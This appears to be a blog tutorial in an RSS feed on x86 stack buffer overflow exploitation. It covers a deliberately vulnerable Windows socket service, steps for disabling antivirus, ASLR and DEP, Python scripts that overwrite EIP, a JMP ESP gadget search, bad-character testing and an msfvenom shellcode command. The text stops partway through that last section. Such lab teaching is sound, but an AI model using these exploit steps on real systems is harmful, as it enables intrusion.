<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Assembly on 4w4647's Blog</title><link>https://4w4647.github.io/tags/assembly/</link><description>Recent content in Assembly on 4w4647's Blog</description><image><title>4w4647's Blog</title><url>https://4w4647.github.io/img/avatar.jpeg</url><link>https://4w4647.github.io/img/avatar.jpeg</link></image><generator>Hugo</generator><language>en</language><lastBuildDate>Thu, 30 Apr 2026 08:12:33 +0545</lastBuildDate><atom:link href="https://4w4647.github.io/tags/assembly/index.xml" rel="self" type="application/rss+xml"/><item><title>Stack Buffer Overflows - EIP Control to Code Execution</title><link>https://4w4647.github.io/posts/stack-buffer-overflows-eip-control-to-code-execution/</link><pubDate>Thu, 30 Apr 2026 08:12:33 +0545</pubDate><guid>https://4w4647.github.io/posts/stack-buffer-overflows-eip-control-to-code-execution/</guid><description>A technical breakdown of x86 stack buffer overflow exploitation against a network service - EIP hijacking, JMP ESP gadget selection, bad character enumeration, shikata_ga_nai decoder mechanics, and shellcode delivery.</description><content:encoded><![CDATA[<h2 id="lab-setup">Lab Setup</h2>
<p>Three things need to be sorted on the Windows lab machine before any of this works cleanly.</p>
<p><strong>Antivirus off.</strong> Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.</p>
<p><strong>ASLR disabled system-wide.</strong> Windows randomizes module base addresses by default, so the address of a given module can differ from one boot to the next (and, for the executable itself, potentially from one run to the next). For foundational exploit development those addresses need to stay the same between runs, so that any gadget address hardcoded in a payload is still valid the next time. This registry key forces that:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">reg add <span class="s2">&#34;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management&#34;</span> /v MoveImages /t REG_DWORD /d 0 /f
</span></span></code></pre></div><p>Reboot after applying it.</p>
<p><strong>DEP disabled for the target binary.</strong> Data Execution Prevention marks stack memory as non-executable at the OS level. If it is enabled, the CPU will refuse to execute code sitting on the stack even if you redirect execution there perfectly. For this lab the binary gets compiled without NX compatibility so the stack stays executable. In real targets this protection gets bypassed with ROP chains rather than compiled away, but that comes later.</p>
<hr>
<h2 id="the-vulnerable-service">The Vulnerable Service</h2>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;winsock2.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">vulnerable</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[*] Copying input into buf[64]...</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[+] Done. You entered: %s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="n">WSADATA</span> <span class="n">wsa</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">SOCKET</span> <span class="n">s</span><span class="p">,</span> <span class="n">client</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">server</span><span class="p">,</span> <span class="n">addr</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">addrlen</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addr</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="kt">char</span> <span class="n">input</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">WSAStartup</span><span class="p">(</span><span class="nf">MAKEWORD</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">wsa</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="n">s</span> <span class="o">=</span> <span class="nf">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">server</span><span class="p">.</span><span class="n">sin_family</span>      <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">server</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">INADDR_ANY</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">server</span><span class="p">.</span><span class="n">sin_port</span>        <span class="o">=</span> <span class="nf">htons</span><span class="p">(</span><span class="mi">4444</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">bind</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">server</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">server</span><span class="p">));</span>
</span></span><span class="line"><span class="cl">    <span class="nf">listen</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[*] Listening on port 4444...</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">client</span> <span class="o">=</span> <span class="nf">accept</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">addr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">addrlen</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[+] Connection accepted</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">recv</span><span class="p">(</span><span class="n">client</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">input</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[*] Received input, passing to vulnerable()</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">vulnerable</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">closesocket</span><span class="p">(</span><span class="n">client</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">WSACleanup</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>The vulnerability is in <code>vulnerable()</code>. The line <code>strcpy(buf, input)</code> copies whatever came in over the network into a 64-byte buffer with no length check whatsoever. <code>strcpy</code> keeps copying bytes until it hits a null byte in the source, regardless of how large the destination is. Send more than 64 bytes and it writes straight past the end of <code>buf</code> into whatever memory sits above it on the stack.</p>
<p>What sits above it turns out to be the saved base pointer and then the return address. And that is where things get interesting.</p>
<p>Compiled from Linux with protections stripped:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">i686-w64-mingw32-gcc -o vuln.exe vuln.c <span class="se">\
</span></span></span><span class="line"><span class="cl">    -fno-stack-protector <span class="se">\
</span></span></span><span class="line"><span class="cl">    -mpreferred-stack-boundary<span class="o">=</span><span class="m">2</span> <span class="se">\
</span></span></span><span class="line"><span class="cl">    -lws2_32 <span class="se">\
</span></span></span><span class="line"><span class="cl">    -Wl,--disable-nxcompat
</span></span></code></pre></div><p>What each flag does:</p>
<ul>
<li><code>-fno-stack-protector</code> disables stack canaries. These are values the compiler inserts between the buffer and the return address that get checked before the function returns. If they are corrupted, the process aborts before <code>ret</code> even executes.</li>
<li><code>-mpreferred-stack-boundary=2</code> uses 4-byte stack alignment instead of 16-byte. Keeps the frame layout clean and predictable.</li>
<li><code>-lws2_32</code> links the Windows Sockets library for the network code.</li>
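<li><code>-Wl,--disable-nxcompat</code> tells the linker to clear the NX-compatible flag in the PE header, marking the binary as not compatible with DEP. Under an opt-in DEP policy, the default on client editions of Windows, that leaves the stack executable for this process. If the flag ends up set instead, DEP applies and the stack is non-executable.</li>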
</ul>
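<p>One way to confirm the linker flag took effect is to read the <code>DllCharacteristics</code> field from the PE header of <code>vuln.exe</code>. The sketch below is not part of the original lab. The helper names are hypothetical and it assumes a well-formed PE file; the two bit values are the documented <code>IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE</code> and <code>IMAGE_DLLCHARACTERISTICS_NX_COMPAT</code> constants.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">DYNAMIC_BASE = 0x0040  # image opts in to ASLR
NX_COMPAT = 0x0100     # image declares itself DEP-compatible


def dll_characteristics(pe_bytes):
    """Return the 16-bit DllCharacteristics field of a PE image."""
    # e_lfanew at offset 0x3C holds the file offset of the PE signature
    pe_off = int.from_bytes(pe_bytes[0x3C:0x40], "little")
    if pe_bytes[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    # The optional header follows the 4-byte signature and 20-byte COFF header.
    # DllCharacteristics sits 70 bytes into it for both PE32 and PE32+.
    field = pe_off + 24 + 70
    return int.from_bytes(pe_bytes[field:field + 2], "little")


def has_flag(flags, mask):
    """True when every bit of mask is set in flags."""
    return (flags | mask) == flags
</code></pre></div>
<p>Reading <code>vuln.exe</code> in binary mode and passing its contents to <code>dll_characteristics()</code> gives the flags. For the lab binary, <code>has_flag(flags, NX_COMPAT)</code> should come back <code>False</code> if <code>--disable-nxcompat</code> was honored.</p>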
<hr>
<h2 id="the-stack-frame">The Stack Frame</h2>
<p>Before calculating offsets there needs to be a clear picture of what the stack looks like when <code>vulnerable()</code> is running.</p>
<p>When <code>main()</code> calls <code>vulnerable(input)</code>, the cdecl calling convention applies. The caller pushes the argument (a 4-byte pointer to <code>input</code>) onto the stack, then executes <code>CALL</code>. The <code>CALL</code> instruction pushes the return address (the address of the next instruction in <code>main</code>) and jumps to <code>vulnerable</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="nv">input_pointer</span>      <span class="c1">; 4-byte pointer to input buffer</span>
</span></span><span class="line"><span class="cl"><span class="nf">call</span> <span class="nv">vulnerable</span>         <span class="c1">; pushes return address, jumps to function</span>
</span></span></code></pre></div><p>Inside <code>vulnerable()</code>, the prologue sets up the stack frame:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="nb">ebp</span>                <span class="c1">; save caller&#39;s base pointer</span>
</span></span><span class="line"><span class="cl"><span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">esp</span>            <span class="c1">; anchor EBP to current stack top</span>
</span></span><span class="line"><span class="cl"><span class="nf">sub</span> <span class="nb">esp</span><span class="p">,</span> <span class="mi">64</span>             <span class="c1">; reserve 64 bytes for buf</span>
</span></span></code></pre></div><p>After the prologue finishes, the stack looks like this:</p>
<pre tabindex="0"><code>High Address
┌──────────────────┐
│  input pointer   │  [ebp+8]   argument pushed by caller
├──────────────────┤
│  return address  │  [ebp+4]   pushed by CALL
├──────────────────┤
│  saved EBP       │  [ebp]     EBP register points here
├──────────────────┤
│                  │
│    buf[64]       │            64 bytes of local buffer
│                  │
│                  │            ESP points here
└──────────────────┘
Low Address
</code></pre><p>The stack grows downward toward lower addresses. <code>buf</code> sits below saved EBP in memory. When <code>strcpy</code> writes into <code>buf</code>, it starts at the bottom of the buffer and fills upward, heading straight toward saved EBP and then the return address.</p>
<p>The offset math is straightforward:</p>
<pre tabindex="0"><code>64 bytes    buf itself
 4 bytes    saved EBP above buf
---------
68 bytes    total to reach the return address
</code></pre><p>Bytes at offset 68 through 71 overwrite the return address. When the function&rsquo;s epilogue runs and <code>ret</code> executes, it pops those 4 bytes into EIP. The CPU jumps to whatever address is there. Put a controlled address in those bytes and execution is hijacked.</p>
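<p>The same arithmetic can be written down as a small lookup, which helps when reasoning about where a given payload byte ends up. This is only a sketch: the names are hypothetical, and it assumes the frame layout drawn above, with <code>buf</code> directly below saved EBP and no padding or canary in between.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">BUF_SIZE = 64        # char buf[64]
SAVED_EBP_SIZE = 4   # one 32-bit register
RET_ADDR_SIZE = 4    # one 32-bit return address

RET_OFFSET = BUF_SIZE + SAVED_EBP_SIZE  # 68


def region_for_offset(offset):
    """Name the stack slot that payload byte number `offset` lands in."""
    if offset in range(0, BUF_SIZE):
        return "buf"
    if offset in range(BUF_SIZE, RET_OFFSET):
        return "saved EBP"
    if offset in range(RET_OFFSET, RET_OFFSET + RET_ADDR_SIZE):
        return "return address"
    # Anything past the return address spills into the caller's frame
    return "caller's frame"
</code></pre></div>
<p>With this layout, offsets 0 through 63 map to <code>buf</code>, 64 through 67 to saved EBP, and 68 through 71 to the return address.</p>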
<hr>
<h2 id="how-the-epilogue-still-works">How the Epilogue Still Works</h2>
<p>The overflow writes <code>0x41414141</code> over the saved EBP value on the stack. A reasonable question is whether this breaks the epilogue before <code>ret</code> even fires.</p>
<p>The epilogue for <code>vulnerable()</code> is:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">mov</span> <span class="nb">esp</span><span class="p">,</span> <span class="nb">ebp</span>        <span class="c1">; collapse local frame, reset ESP</span>
</span></span><span class="line"><span class="cl"><span class="nf">pop</span> <span class="nb">ebp</span>             <span class="c1">; restore saved EBP from stack into EBP register</span>
</span></span><span class="line"><span class="cl"><span class="nf">ret</span>                 <span class="c1">; pop return address into EIP</span>
</span></span></code></pre></div><p>The key detail is that <code>mov esp, ebp</code> reads from the EBP <strong>register</strong>, not from the saved value on the stack. The EBP register was set during the prologue with <code>mov ebp, esp</code> and was never touched again during the function body. It still holds the correct address pointing at the saved EBP location on the stack.</p>
<p>So the epilogue runs correctly. <code>mov esp, ebp</code> resets ESP to the right place. <code>pop ebp</code> loads the corrupted <code>0x41414141</code> into the EBP register, which breaks the caller&rsquo;s frame, but by this point execution is being taken over so it does not matter. Then <code>ret</code> pops the overwritten return address into EIP and the CPU jumps there.</p>
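<p>The three epilogue instructions can be traced on a toy model of the registers and stack. This is an illustrative sketch rather than an emulator. The function name is hypothetical, and the frame address is an assumption inferred from the crash dump shown later in this post.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">def run_epilogue(regs, stack):
    """Apply `mov esp, ebp; pop ebp; ret` to a toy register/stack model."""
    regs = dict(regs)
    # mov esp, ebp: uses the EBP *register*, not the saved copy in memory
    regs["esp"] = regs["ebp"]
    # pop ebp: load the (possibly overwritten) saved EBP, then ESP += 4
    regs["ebp"] = stack[regs["esp"]]
    regs["esp"] += 4
    # ret: load the (possibly overwritten) return address, then ESP += 4
    regs["eip"] = stack[regs["esp"]]
    regs["esp"] += 4
    return regs


# Address of the saved EBP slot, inferred from the crash dump (assumption)
FRAME = 0x0126F8BC
stack = {
    FRAME: 0x41414141,      # saved EBP slot, overwritten with "AAAA"
    FRAME + 4: 0x42424242,  # return address slot, overwritten with "BBBB"
}
after = run_epilogue({"ebp": FRAME, "esp": FRAME - 64, "eip": 0}, stack)
</code></pre></div>
<p>In this model <code>after</code> ends up with EBP holding <code>0x41414141</code>, EIP holding <code>0x42424242</code>, and ESP eight bytes above the saved EBP slot, just past the overwritten return address.</p>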
<hr>
<h2 id="confirming-eip-control">Confirming EIP Control</h2>
<p>Theory needs to be verified. A quick script confirms the offset:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">socket</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;B&#34;</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;C&#34;</span> <span class="o">*</span> <span class="mi">100</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s2">&#34;192.168.122.85&#34;</span><span class="p">,</span> <span class="mi">4444</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span></code></pre></div><p>68 <code>A</code>s to fill <code>buf</code> and overwrite saved EBP. 4 <code>B</code>s at offset 68 to land on the return address. 100 <code>C</code>s as padding.</p>
<p>WinDbg crash output:</p>
<pre tabindex="0"><code>(15cc.229c): Access violation - code c0000005 (second chance)
eax=00000066 ebx=019e0df8 ecx=00000000 edx=00df0000 esi=019e0e88 edi=00000059
eip=42424242 esp=0126f8c4 ebp=41414141 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
42424242 ??              ???
</code></pre><p>EIP is <code>42424242</code> which is <code>BBBB</code>. EBP is <code>41414141</code> which is <code>AAAA</code>. The offset is confirmed at 68 bytes.</p>
<p>There is something else worth noting in the crash output. ESP is sitting at <code>0126f8c4</code> and it is pointing directly at the <code>C</code>s. After <code>ret</code> pops the return address into EIP, ESP advances by 4 bytes and lands on whatever came immediately after the return address in the payload. That is attacker-controlled data sitting right at ESP. This is the mechanism that makes <code>JMP ESP</code> useful.</p>
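<p>Register values from a crash can be mapped back to payload offsets mechanically. The following sketch uses a hypothetical helper name and assumes the marker bytes are unique within the payload, as they are in the test payload above.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">def register_as_payload_bytes(value):
    """Bytes that must have been on the stack to load this 32-bit value."""
    return value.to_bytes(4, "little")


payload = b"A" * 68 + b"B" * 4 + b"C" * 100

eip_bytes = register_as_payload_bytes(0x42424242)  # EIP from the crash
eip_offset = payload.find(eip_bytes)               # where EIP was loaded from
esp_offset = eip_offset + len(eip_bytes)           # ret leaves ESP just past it
</code></pre></div>
<p>Here <code>eip_offset</code> comes out as 68 and <code>esp_offset</code> as 72, the first of the <code>C</code> bytes.</p>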
<hr>
<h2 id="finding-a-jmp-esp-gadget">Finding a JMP ESP Gadget</h2>
<p>With EIP control confirmed, the next step is figuring out where to redirect execution. The goal is to execute shellcode, and the shellcode will be placed right after the overwritten return address in the payload. At the moment <code>ret</code> fires, ESP points directly at that shellcode.</p>
<p>So what is needed is an instruction somewhere in memory that says &ldquo;jump to whatever ESP points at.&rdquo; In x86, <code>JMP ESP</code> does exactly that. Its opcode is two bytes: <code>FF E4</code>.</p>
<p>The challenge is finding a copy of those two bytes at an address that is stable and predictable. If the address changes between runs, the hardcoded value in the payload becomes wrong and the exploit crashes. This is exactly why ASLR was disabled earlier.</p>
<p><strong>Step 1: Find out what modules are loaded.</strong></p>
<p>In WinDbg, the <code>lm</code> command lists all loaded modules with their start and end addresses:</p>
<pre tabindex="0"><code>0:000&gt; lm
start    end        module name
00400000 0043c000   vuln
75c80000 75d47000   msvcrt
75de0000 75ed0000   KERNEL32
77640000 7790a000   KERNELBASE
77950000 77b0f000   ntdll
</code></pre><p>Each line shows the start address, end address, and name of a loaded module. These are the regions of memory available to search for a gadget.</p>
<p><strong>Step 2: Calculate the search range.</strong></p>
<p>To search a module for <code>FF E4</code>, the <code>s</code> command in WinDbg needs a start address and a length. The length is calculated by subtracting the start address from the end address.</p>
<p>For <code>msvcrt</code>:</p>
<pre tabindex="0"><code>end   - start  = length
75d47000 - 75c80000 = c7000
</code></pre><p>So the search length for <code>msvcrt</code> is <code>0xc7000</code> bytes, which covers the entire module.</p>
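<p>When several modules need searching, the subtraction is easy to script. The sketch below builds the WinDbg search command for each module from its start and end addresses. The function name is hypothetical, and the addresses are the ones from the <code>lm</code> output above.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">def search_command(start, end, pattern="ff e4"):
    """Build a WinDbg `s` command covering [start, end) of one module."""
    length = end - start
    return "s 0x{:08x} L0x{:x} {}".format(start, length, pattern)


# (start, end) pairs copied from the lm listing
modules = {
    "msvcrt": (0x75C80000, 0x75D47000),
    "KERNEL32": (0x75DE0000, 0x75ED0000),
}
commands = {name: search_command(*bounds) for name, bounds in modules.items()}
</code></pre></div>
<p>For <code>msvcrt</code> this produces <code>s 0x75c80000 L0xc7000 ff e4</code>.</p>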
<p><strong>Step 3: Search for the opcode.</strong></p>
<pre tabindex="0"><code>0:000&gt; s 0x75c80000 L0xc7000 ff e4
75d099fd  ff e4 00 00 57 e8 39 ee-fb ff 83 c4 14 8b bd 34
</code></pre><p>The <code>s</code> command syntax is <code>s &lt;start&gt; L&lt;length&gt; &lt;bytes&gt;</code>. WinDbg found <code>FF E4</code> at address <code>0x75d099fd</code> inside <code>msvcrt.dll</code>.</p>
<p><strong>Step 4: Verify it is actually JMP ESP.</strong></p>
<p>Finding the bytes is not enough. They need to be disassembled to confirm they form a valid instruction at that address:</p>
<pre tabindex="0"><code>0:000&gt; u 0x75d099fd L1
msvcrt!_winput_s_l+0xa5d:
75d099fd ffe4            jmp     esp
</code></pre><p>Confirmed. <code>0x75d099fd</code> contains <code>JMP ESP</code>.</p>
<p><strong>Step 5: Verify the address is stable.</strong></p>
<p>With ASLR disabled system-wide, restarting the program should load <code>msvcrt</code> at the same base address. Running <code>lm</code> across multiple sessions confirmed <code>msvcrt</code> consistently loading at <code>0x75c80000</code>, which means <code>0x75d099fd</code> is reliable.</p>
<p>One more check: the address itself must not contain any null bytes, because <code>strcpy</code> stops copying at <code>0x00</code>. Looking at <code>75 d0 99 fd</code>, there are no null bytes. The gadget address is clean.</p>
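<p>Both checks on a candidate address, that it lies inside the module and that none of its bytes are bad characters, can be combined in one helper. This is a minimal sketch with a hypothetical function name. The default bad-byte set assumes only <code>0x00</code> is a problem.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">def address_is_usable(addr, module_start, module_end, bad_bytes=b"\x00"):
    """True if addr lies inside the module and contains none of bad_bytes."""
    in_module = addr in range(module_start, module_end)
    # Byte order does not matter for this check, only the byte values do
    packed = addr.to_bytes(4, "little")
    clean = not any(b in bad_bytes for b in packed)
    return in_module and clean
</code></pre></div>
<p>Calling <code>address_is_usable(0x75d099fd, 0x75c80000, 0x75d47000)</code> returns <code>True</code> for the gadget found above.</p>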
<hr>
<h2 id="little-endian-packing">Little-Endian Packing</h2>
<p>x86 is little-endian. Multi-byte values are stored in memory with the least significant byte at the lowest address. The address <code>0x75d099fd</code> does not go into the payload as-is. It gets stored reversed: <code>fd 99 d0 75</code>.</p>
<p>Python handles this with <code>struct.pack</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">struct</span>
</span></span><span class="line"><span class="cl"><span class="n">jmp_esp</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="mh">0x75d099fd</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># produces the bytes fd 99 d0 75 (Python displays them as b&#39;\xfd\x99\xd0u&#39;)</span>
</span></span></code></pre></div><p>The <code>&lt;</code> means little-endian. <code>I</code> is an unsigned 32-bit integer. Getting the byte order wrong loads a garbage address into EIP and the exploit crashes with no obvious indication of the cause.</p>
<hr>
<h2 id="bad-character-enumeration">Bad Character Enumeration</h2>
<p><code>strcpy</code> stops at <code>0x00</code>. Any null byte anywhere in the payload truncates everything that follows it. Other byte values might also get corrupted depending on how the service processes input, and shellcode containing a corrupted byte will silently fail mid-execution.</p>
<p>The process for finding bad characters is to send every possible byte value through the vulnerability and compare what arrives on the stack against what was sent:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">socket</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">bad_chars</span> <span class="o">=</span> <span class="nb">bytes</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">256</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;B&#34;</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">bad_chars</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s2">&#34;192.168.122.85&#34;</span><span class="p">,</span> <span class="mi">4444</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span></code></pre></div><p>After the crash, <code>db esp L100</code> in WinDbg shows the raw bytes that landed on the stack. WinDbg reads <code>L100</code> as hexadecimal, so this dumps 0x100 (256) bytes, enough to cover all 255 test bytes. Comparing byte by byte against the expected sequence <code>01 02 03 ... fd fe ff</code> reveals any bytes that went missing or got changed.</p>
<p>For this target, every byte from <code>0x01</code> through <code>0xff</code> arrived intact. The only bad character is:</p>
<ul>
<li><code>0x00</code>: the null terminator, which makes <code>strcpy</code> stop copying immediately</li>
</ul>
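<p>Comparing a dump by eye is error-prone, so the comparison can be scripted. The sketch below assumes the 32-bit <code>db</code> line layout (an address, sixteen hex pairs with a dash in the middle, then an ASCII column) and that all dumped memory is readable. Both function names are hypothetical.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">def parse_db_dump(text):
    """Extract raw bytes from 32-bit WinDbg `db` output lines."""
    data = bytearray()
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        # After the address come 16 hex pairs (47 columns); the rest is ASCII
        hex_field = parts[1][:47].replace("-", " ")
        data.extend(int(tok, 16) for tok in hex_field.split())
    return bytes(data)


def first_bad_char(sent, received):
    """Return the first sent byte that is missing or altered, or None."""
    for i, expected in enumerate(sent):
        if received[i:i + 1] != bytes([expected]):
            # Later bytes may be shifted after a mismatch, so stop here;
            # drop this byte from the test sequence and resend to continue
            return expected
    return None
</code></pre></div>
<p>Pasting the <code>db</code> output into <code>parse_db_dump()</code> and passing the result to <code>first_bad_char(bytes(range(1, 256)), received)</code> returns <code>None</code> when every byte arrived intact.</p>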
<hr>
<h2 id="generating-shellcode">Generating Shellcode</h2>
<p>With bad characters confirmed, <code>msfvenom</code> generates shellcode that avoids them:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p windows/exec <span class="nv">CMD</span><span class="o">=</span>calc.exe -b <span class="s2">&#34;\x00&#34;</span> -f python
</span></span></code></pre></div><pre tabindex="0"><code>Found 11 compatible encoders
